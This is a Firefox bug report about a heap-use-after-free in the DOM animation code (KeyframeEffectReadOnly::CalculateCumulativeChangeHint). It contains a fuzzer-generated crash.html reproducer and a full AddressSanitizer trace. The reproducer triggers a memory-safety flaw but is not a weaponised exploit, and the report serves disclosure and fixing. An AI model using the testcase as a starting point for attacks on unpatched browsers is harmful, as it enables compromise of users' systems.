Closed Bug 1296565 Opened 8 years ago Closed 8 years ago

heap-use-after-free in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint

Categories

(Core :: DOM: Animation, defect)

Product:
Core
Component:
DOM: Animation
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1289701
Tracking Flags:
Tracking Status
firefox51 --- affected

People

(Reporter: nils, Unassigned)

Details

(4 keywords)

Attachments

(1 file)

crash.html
739 bytes, text/html
Details
Attached file crash.html 
The testcase crashes the latest ASAN build of Firefox as follows.

crash.html:

<script>
function start() {      
        o1=document.documentElement;
        o1.setAttribute('hidden','false');
        o1.innerHTML="<svg><font><script>";
        o4=o1.querySelectorAll('*')[1];
        o29=o1.querySelectorAll('*')[4];
        o29.innerHTML="<svg><style>@font-face{ font-family: font7; src: url('x') format('eot')}\n*{ font-size: 85rem!important; all: initial<metadata><foreignObject>";
        o62=o29.querySelectorAll('*')[3];
        while(o1.firstChild)o1.removeChild(o1.firstChild);
        requestAnimationFrame(f1);
}
function f1() {
        o62.innerHTML="<svg><style>@keyframes{}*{ animation-name: key12; animation-duration: 0.001s<style>@keyframes{}\n@keyframes key12{ from{ font: larger Helvetica";
        o1.appendChild(o4);
        location.reload();
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==19899==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500034e208 at pc 0x7f882eb48e25 bp 0x7ffe17a73310 sp 0x7ffe17a73308
READ of size 4 at 0x61500034e208 thread T0 (Web Content)
    #0 0x7f882eb48e24 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1504:54
    #1 0x7f882eb32385 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:599:3
    #2 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #3 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #4 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #5 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #6 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #7 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #8 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #9 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #10 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #11 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #12 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #13 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #14 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #15 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #16 0x7f883320d1e4 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3393:7
    #17 0x7f88331f226c in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3803:3
    #18 0x7f88331f0f91 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:746:3
    #19 0x7f8833215cc6 in BeginProcessingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:853:5
    #20 0x7f8833215cc6 in mozilla::RestyleTracker::DoProcessRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleTracker.cpp:153
    #21 0x7f88331f91b3 in ProcessRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:483:7
    #22 0x7f88331f91b3 in mozilla::RestyleManager::ProcessPendingRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:816
    #23 0x7f883342c9ed in ProcessPendingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #24 0x7f883342c9ed in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:4123
    #25 0x7f883315148b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1737:11
    #26 0x7f883315ce4c in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:247:7
    #27 0x7f883315cb19 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:266:5
    #28 0x7f883315e594 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:426:9
    #29 0x7f8833aaac74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #30 0x7f882d615454 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20
    #31 0x7f882d0ca39f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2048:16
    #32 0x7f882cff9897 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1662:14
    #33 0x7f882cff66d6 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1600:17
    #34 0x7f882cfe44a7 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1567:5
    #35 0x7f882d013dc2 in applyImpl<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #36 0x7f882d013dc2 in apply<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #37 0x7f882d013dc2 in mozilla::detail::RunnableMethodImpl<bool (mozilla::ipc::MessageChannel::*)(), false, true>::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #38 0x7f882d0133af in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:546:22
    #39 0x7f882d0133af in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:565
    #40 0x7f882c264426 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1058:7
    #41 0x7f882c2e23bc in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #42 0x7f882d000bf4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:124:5
    #43 0x7f882cf75b08 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #44 0x7f882cf75b08 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #45 0x7f882cf75b08 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #46 0x7f8832ac35af in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #47 0x7f8834b7a677 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:846:12
    #48 0x7f882cf75b08 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #49 0x7f882cf75b08 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #50 0x7f882cf75b08 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #51 0x7f8834b79d13 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:676:7
    #52 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #53 0x4dfb2b in main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #54 0x7f884771a82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #55 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)

0x61500034e208 is located 8 bytes inside of 512-byte region [0x61500034e200,0x61500034e400)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f882c09cf71 in Free /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:170:34
    #2 0x7f882c09cf71 in nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::ShrinkCapacity(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:230
    #3 0x7f882eb32232 in Clear /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1591:18
    #4 0x7f882eb32232 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:903
    #5 0x7f882eb32232 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:2100
    #6 0x7f882eb32232 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:590
    #7 0x7f882eb43abe in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(nsTArray<mozilla::Keyframe>&&, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:489:5
    #8 0x7f8832ec3236 in UpdateOldAnimationPropertiesWithNew /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:343:5
    #9 0x7f8832ec3236 in CSSAnimationBuilder::Build(nsPresContext*, mozilla::StyleAnimation const&, nsCSSKeyframesRule const*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:627
    #10 0x7f8832ec1e16 in nsAnimationManager::BuildAnimations(nsStyleContext*, mozilla::dom::Element*, mozilla::AnimationCollection<mozilla::dom::CSSAnimation>*, nsTArray<RefPtr<mozilla::dom::CSSAnimation> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:1090:33
    #11 0x7f8832ec13a1 in nsAnimationManager::UpdateAnimations(nsStyleContext*, mozilla::dom::Element*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:405:5
    #12 0x7f88330d7dc8 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:950:7
    #13 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #14 0x7f88330dc0e9 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1326:10
    #15 0x7f883303878b in ResolveStyleFor /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85:3
    #16 0x7f883303878b in CalcLengthWith(nsCSSValue const&, int, nsStyleFont const*, nsStyleContext*, nsPresContext*, bool, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:533
    #17 0x7f883313aad1 in SetFontSizeCalcOps::ComputeLeafValue(nsCSSValue const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3240:14
    #18 0x7f883309a316 in nsRuleNode::SetFontSize(nsPresContext*, nsRuleData const*, nsStyleFont const*, nsStyleFont const*, int*, nsFont const&, int, int, bool, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3334:14
    #19 0x7f883309f9a1 in nsRuleNode::SetFont(nsPresContext*, nsStyleContext*, unsigned char, nsRuleData const*, nsStyleFont const*, nsStyleFont*, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3920:3
    #20 0x7f8833043c46 in nsRuleNode::ComputeFontData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:4179:5
    #21 0x7f883303ddc1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:2516:10
    #22 0x7f883303e831 in nsStyleContext::StyleData(nsStyleStructID) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleContext.cpp:455:15
    #23 0x7f882eb4f563 in mozilla::dom::CreateStyleContextForAnimationValue(nsCSSProperty, mozilla::StyleAnimationValue, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1486:3
    #24 0x7f882eb48a0b in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1500:9
    #25 0x7f882eb32385 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:599:3
    #26 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #27 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #28 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #29 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #30 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #31 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #32 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #33 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #34 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #35 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #36 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5

previously allocated by thread T0 (Web Content) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0d7d in moz_xrealloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7f882c09d571 in Realloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:182:12
    #3 0x7f882c09d571 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayInfallibleAllocator>(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7f882eb47966 in AppendElements<nsTArrayInfallibleAllocator> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1544:34
    #5 0x7f882eb47966 in AppendElement<nsTArrayInfallibleAllocator> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1572
    #6 0x7f882eb47966 in BuildSegmentsFromValueEntries /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeUtils.cpp:1200
    #7 0x7f882eb47966 in mozilla::KeyframeUtils::GetAnimationPropertiesFromKeyframes(nsTArray<mozilla::Keyframe> const&, nsTArray<nsTArray<mozilla::PropertyStyleAnimationValuePair> > const&, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeUtils.cpp:670
    #8 0x7f882eb31c9a in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:560:7
    #9 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #10 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #11 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #12 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #13 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #14 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #15 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #16 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #17 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #18 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #19 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #20 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #21 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #22 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #23 0x7f883320d1e4 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3393:7
    #24 0x7f88331f226c in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3803:3
    #25 0x7f88331f0f91 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:746:3
    #26 0x7f8833215cc6 in BeginProcessingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:853:5
    #27 0x7f8833215cc6 in mozilla::RestyleTracker::DoProcessRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleTracker.cpp:153
    #28 0x7f88331f91b3 in ProcessRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:483:7
    #29 0x7f88331f91b3 in mozilla::RestyleManager::ProcessPendingRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:816
    #30 0x7f883342c9ed in ProcessPendingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #31 0x7f883342c9ed in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:4123
    #32 0x7f883315148b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1737:11
    #33 0x7f883315ce4c in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:247:7
    #34 0x7f883315cb19 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:266:5
    #35 0x7f883315e594 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:426:9
    #36 0x7f8833aaac74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #37 0x7f882d615454 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1504:54 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*)
Shadow bytes around the buggy address:
  0x0c2a80061bf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a80061c40: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a80061c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
